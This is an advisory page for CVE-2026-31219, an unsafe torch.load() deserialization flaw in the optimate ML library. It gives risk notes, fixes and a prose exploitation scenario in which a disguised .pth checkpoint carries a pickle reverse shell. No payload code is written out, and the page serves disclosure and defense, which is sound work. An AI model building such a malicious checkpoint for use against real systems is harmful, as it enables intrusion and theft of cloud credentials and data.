CVE-2026-31219: optimate: RCE via unsafe torch.load() deserialization
AWAITING NVDThe nebuly-ai optimate ML optimization library loads model files using torch.load() without the weights_only=True safeguard, allowing arbitrary code execution when a user processes a maliciously crafted .pt or .pth file. This is a classic pickle deserialization vulnerability in a training pipeline context—any data scientist or MLOps engineer who downloads and loads an external model checkpoint is at risk of full system compromise with the privileges of the training process. No CVSS score has been formally assigned yet, no public exploits are available, and the package is not in CISA KEV, but pickle-based RCE is trivial to weaponize once the delivery mechanism is in place; training machines commonly hold cloud IAM credentials, dataset access, and MLOps pipeline permissions, making the blast radius significant despite the niche package. Teams using optimate should patch _load_model() to pass weights_only=True or migrate model storage to safetensors format, which eliminates pickle deserialization entirely.
Risk Assessment
Medium-high risk for organizations using optimate in ML training workflows. Exploitation requires delivering a malicious model file to a victim who then loads it via the --model CLI argument—a realistic vector in ML environments where pre-trained checkpoints are routinely shared via GitHub, Hugging Face, or internal registries. The attack requires no privileges on the target system and delivers full RCE; once formally scored this will likely land HIGH or CRITICAL on CVSS. The blast radius is constrained by optimate's niche adoption, but organizations running active model experimentation with external checkpoints are directly exposed, and training machines are high-value targets due to their broad access to data, credentials, and cloud infrastructure.
Attack Kill Chain
Severity & Risk
Recommended Action
1 step-
1) Patch: update _load_model() in neural_magic_training.py to use torch.load(path, weights_only=True), restricting deserialization to safe tensor primitives. 2) Migrate: transition model storage to safetensors format, which eliminates pickle deserialization entirely and is the recommended long-term fix for any PyTorch model loading workflow. 3) Validate: implement model file integrity checks (cryptographic hash verification against a trusted manifest) before loading any external checkpoint. 4) Isolate: run training workloads in containers with minimal filesystem permissions, no outbound internet access, and scoped IAM roles—limit the blast radius if exploitation occurs. 5) Detect: monitor for anomalous process spawning from Python interpreter processes during model loading phases; unexpected network connections or child process creation are IOCs for pickle payload execution.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-31219?
The nebuly-ai optimate ML optimization library loads model files using torch.load() without the weights_only=True safeguard, allowing arbitrary code execution when a user processes a maliciously crafted .pt or .pth file. This is a classic pickle deserialization vulnerability in a training pipeline context—any data scientist or MLOps engineer who downloads and loads an external model checkpoint is at risk of full system compromise with the privileges of the training process. No CVSS score has been formally assigned yet, no public exploits are available, and the package is not in CISA KEV, but pickle-based RCE is trivial to weaponize once the delivery mechanism is in place; training machines commonly hold cloud IAM credentials, dataset access, and MLOps pipeline permissions, making the blast radius significant despite the niche package. Teams using optimate should patch _load_model() to pass weights_only=True or migrate model storage to safetensors format, which eliminates pickle deserialization entirely.
Is CVE-2026-31219 actively exploited?
No confirmed active exploitation of CVE-2026-31219 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-31219?
1) Patch: update _load_model() in neural_magic_training.py to use torch.load(path, weights_only=True), restricting deserialization to safe tensor primitives. 2) Migrate: transition model storage to safetensors format, which eliminates pickle deserialization entirely and is the recommended long-term fix for any PyTorch model loading workflow. 3) Validate: implement model file integrity checks (cryptographic hash verification against a trusted manifest) before loading any external checkpoint. 4) Isolate: run training workloads in containers with minimal filesystem permissions, no outbound internet access, and scoped IAM roles—limit the blast radius if exploitation occurs. 5) Detect: monitor for anomalous process spawning from Python interpreter processes during model loading phases; unexpected network connections or child process creation are IOCs for pickle payload execution.
What systems are affected by CVE-2026-31219?
This vulnerability affects the following AI/ML architecture patterns: ML training pipelines, Model fine-tuning workflows, Neural network optimization pipelines, MLOps experiment tracking environments.
What is the CVSS score for CVE-2026-31219?
No CVSS score has been assigned yet.
Technical Details
NVD Description
The _load_model() function in the neural_magic_training.py script of the optimate project in commit a6d302f912b481c94370811af6b11402f51d377f (2024-07-21) is vulnerable to insecure deserialization (CWE-502). When a user provides a single model file path (e.g., .pt or .pth) via the --model command-line argument, the function loads the file using torch.load() without enabling the weights_only=True security parameter. This allows the deserialization of arbitrary Python objects through the Pickle module. A remote attacker can exploit this by providing a maliciously crafted model file, leading to arbitrary code execution during deserialization on the victim's system.
Exploitation Scenario
An adversary crafts a malicious PyTorch .pth file containing an embedded pickle payload—for example, a reverse shell to an attacker-controlled server. The file is disguised as a legitimate neural magic pre-trained model checkpoint and distributed via a public GitHub release, a compromised model registry, or a spearphishing email targeting a data scientist. When the victim runs the optimate training script with --model path/to/malicious.pth, torch.load() invokes Python's Pickle deserializer without restriction, executing the attacker's code with the full privileges of the training process. The attacker gains a shell on a machine that typically has direct access to cloud storage buckets, MLflow or W&B experiment logs, and IAM credentials for cloud GPU provisioning.
Timeline
Related Vulnerabilities
CVE-2025-59528 10.0 Flowise: Unauthenticated RCE via MCP config injection
Same attack type: Supply Chain CVE-2024-2912 10.0 BentoML: RCE via insecure deserialization (CVSS 10)
Same attack type: Supply Chain CVE-2023-3765 10.0 MLflow: path traversal allows arbitrary file read
Same attack type: Supply Chain CVE-2025-5120 10.0 smolagents: sandbox escape enables unauthenticated RCE
Same attack type: Supply Chain CVE-2026-21858 10.0 n8n: Input Validation flaw enables exploitation
Same attack type: Code Execution
AI Threat Alert